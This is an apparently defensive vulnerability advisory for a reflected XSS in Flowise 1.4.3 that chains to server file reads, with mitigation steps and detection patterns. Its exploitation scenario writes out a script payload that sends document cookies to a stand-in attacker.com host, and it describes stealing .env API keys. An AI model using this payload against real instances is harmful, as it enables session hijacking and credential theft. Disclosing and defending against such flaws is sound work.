CVE-2024-37145: Flowise: reflected XSS enables file read chain via chatflow

MEDIUM PoC AVAILABLE

Published July 1, 2024

CISO Take

Flowise 1.4.3 contains a reflected XSS in the unauthenticated `/api/v1/chatflows-streaming/id` endpoint — when a chatflow ID is not found, its value is echoed unsanitized into a text/html 404 response, allowing an attacker to deliver a crafted URL that executes arbitrary JavaScript in any user's browser. Because Flowise ships with no authentication by default, this is a zero-credential network attack against any internet-exposed instance, and a public PoC already exists. More critically, this XSS chains with a path injection flaw to enable arbitrary file reads from the Flowise server, potentially exposing LLM API keys, database credentials, and system prompts stored in environment files. With 16 CVEs now catalogued against Flowise and no patch available at time of CVE publication, organizations should immediately enable authentication, restrict network access to trusted hosts, and rotate any secrets accessible from the server filesystem.

Sources: NVD GitHub Advisory ATLAS

Risk Assessment

Despite a CVSS 6.1 Medium score — reduced by the required user interaction — the effective risk is elevated for several compounding reasons: a working PoC is publicly available; the default no-authentication configuration maximizes exposed attack surface; and the XSS-to-path-injection chain escalates impact well beyond typical reflected XSS into server-side credential exfiltration. Flowise is widely deployed as an LLM orchestration layer with privileged access to AI service API keys and internal data sources. The pattern of 16 cumulative CVEs in this package indicates systemic security debt and increases confidence that additional unpatched paths exist.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
flowise	npm	—	No patch

Do you use flowise? You're affected.

Severity & Risk

CVSS 3.1

6.1 / 10

EPSS

N/A

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

Enable authentication immediately — set FLOWISE_USERNAME and FLOWISE_PASSWORD environment variables; this single control eliminates the unauthenticated attack surface.
Restrict network exposure — place Flowise behind a VPN or reverse proxy with IP allowlisting; do not expose the admin UI to the public internet.
Upgrade — verify the installed version and apply any patch released after July 2024 via the FlowiseAI GitHub releases page.
Rotate secrets — assume any API keys, credentials, or secrets accessible from the server filesystem are compromised on any previously public-facing instance.
Detect — monitor web access logs for requests to /api/v1/chatflows-streaming/ containing script tags, javascript: URIs, or URL-encoded equivalents (%3Cscript, %6A%61%76%61%73%63%72%69%70%74).
Reference GHSL-2023-232 and GHSL-2023-234 from GitHub Security Lab for the full technical disclosure of the attack chain.

Classification

Code Execution Data Extraction Privacy Violation Agent Framework AML.T0011.003 - Malicious Link AML.T0025 - Exfiltration via Cyber Means AML.T0049 - Exploit Public-Facing Application AML.T0055 - Unsecured Credentials AML.T0083 - Credentials from AI Agent Configuration

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.3 - AI system security testing

NIST AI RMF

MANAGE-2.2 - Mechanisms to achieve AI risk goals are planned and organizational responsibilities are assigned

OWASP LLM Top 10

LLM05 - Improper Output Handling

Technical Details

NVD Description

Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `/api/v1/chatflows-streaming/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.

Exploitation Scenario

An attacker identifies a publicly accessible Flowise instance — trivial via Shodan or Censys since Flowise runs on a distinctive default port. They craft a URL to `/api/v1/chatflows-streaming/<script>fetch('https://attacker.com/c?d='+btoa(document.cookie))</script>` and deliver it via phishing email or Slack message to a Flowise user or admin. When the victim clicks the link, Flowise reflects the chatflow ID raw into a text/html 404 response, executing the injected script in the victim's browser context. The attacker captures session tokens or admin credentials. In a second stage, the attacker leverages the path injection chain to issue a request reading the server's .env file, extracting OpenAI and Anthropic API keys along with any database credentials — pivoting to the organization's full AI stack without any further authentication.